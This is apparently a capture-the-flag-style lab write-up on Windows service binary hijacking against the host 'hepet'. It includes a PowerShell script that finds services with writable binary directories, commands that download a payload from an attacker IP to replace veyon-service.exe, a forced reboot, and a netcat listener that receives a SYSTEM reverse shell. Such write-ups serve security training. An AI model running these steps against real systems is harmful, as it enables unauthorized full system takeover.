Binary Hijacking


There is a service running with SYSTEM privileges whose binary is located in a directory where the current user, ela arwel, has full write access.

The writable directory is the root cause: an attacker with access to this account can replace the service binary with a malicious executable. The replacement only takes effect when the service is restarted, and a standard user normally cannot stop and start a SYSTEM service directly. Because ela arwel holds SeShutdownPrivilege, however, the host can be rebooted, and when the service starts again on boot it runs the replaced binary as SYSTEM, giving the attacker full control of the system.

This misconfiguration can therefore be exploited for privilege escalation, allowing an unprivileged user to execute arbitrary code with the highest level of system permissions. Back up the original binary before replacing it so the service can be restored afterwards.
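The following PowerShell is an added example, not part of the original writeup, showing how the condition above is found in the first place: it walks every installed service, extracts the binary path (quoted or unquoted), tests whether the current user can actually write to that directory, and then checks whether the service can be restarted directly or whether a reboot (via SeShutdownPrivilege) is needed. The function names and the write-probe approach are this example's own choices; it assumes a Windows host with PowerShell 5.1 or later, run as the low-privileged user.

```powershell
# Added example (not from the original writeup): locate services whose binary
# lives in a directory writable by the current user, the precondition for
# binary hijacking, then decide between a direct restart and a reboot.

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName is either "C:\Program Files\X\svc.exe" -args
    # (quoted) or C:\Program Files\X\svc.exe -args (unquoted).
    if ($PathName -match '^\s*"([^"]+)"')  { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }   # -match is case-insensitive
    return $null
}

function Test-DirectoryWritable {
    param([string]$Directory)
    # Effective-permission check: actually create and delete a temp file.
    # Parsing ACLs misses inherited group rights; a real write does not.
    # (This touches disk, so it is visible to file-system monitoring.)
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Find-HijackableServices {
    Get-CimInstance Win32_Service | ForEach-Object {
        $bin = Get-ServiceBinaryPath $_.PathName
        if (-not $bin) { return }                      # skip this service
        $dir = Split-Path -Parent $bin
        if (-not (Test-Path -LiteralPath $dir)) { return }
        if (Test-DirectoryWritable $dir) {
            [pscustomobject]@{
                Name      = $_.Name
                StartName = $_.StartName   # LocalSystem => runs as SYSTEM
                StartMode = $_.StartMode   # Auto => comes back after a reboot
                State     = $_.State
                Binary    = $bin
            }
        }
    }
}

function Test-ServiceRestartable {
    param([string]$ServiceName)
    # Attempt a direct restart; if the service ACL denies it, the fallback is
    # a reboot, which requires SeShutdownPrivilege (checked below).
    try {
        Restart-Service -Name $ServiceName -Force -ErrorAction Stop
        return $true
    } catch {
        Write-Warning "Cannot restart $ServiceName directly: $($_.Exception.Message)"
        return $false
    }
}

# Candidates: anything with StartName LocalSystem and StartMode Auto is the
# most valuable, since it restarts as SYSTEM on every boot.
Find-HijackableServices | Format-Table -AutoSize

# Is a reboot available to this user if the service cannot be restarted?
whoami /priv | Select-String 'SeShutdownPrivilege'

# After dropping the payload in place of the binary (see the steps below):
#   if (-not (Test-ServiceRestartable -ServiceName '<service>')) { shutdown /r /t 0 }
```

Run the enumeration before touching anything; the restart test is only worth calling once the payload is in place, because a successful direct restart will immediately execute whatever binary is in the path.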

PS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe veyon-service.exe.bak

PS C:\Users\Ela Arwel\Veyon> iwr -Uri http://192.168.45.153/veyon-service.exe -OutFile .\veyon-service.exe

Backing up the original binary and fetching the payload in its place

PS C:\Users\Ela Arwel\Veyon> cmd /c shutdown /r

Rebooting so the service starts again with the replaced binary

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.159.140] 49670
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32> whoami
nt authority\system

C:\WINDOWS\system32> hostname
hepet

C:\WINDOWS\system32> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.159.140
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.159.254

System Level Compromise: the listener on 192.168.45.153 receives a reverse shell from hepet running as nt authority\system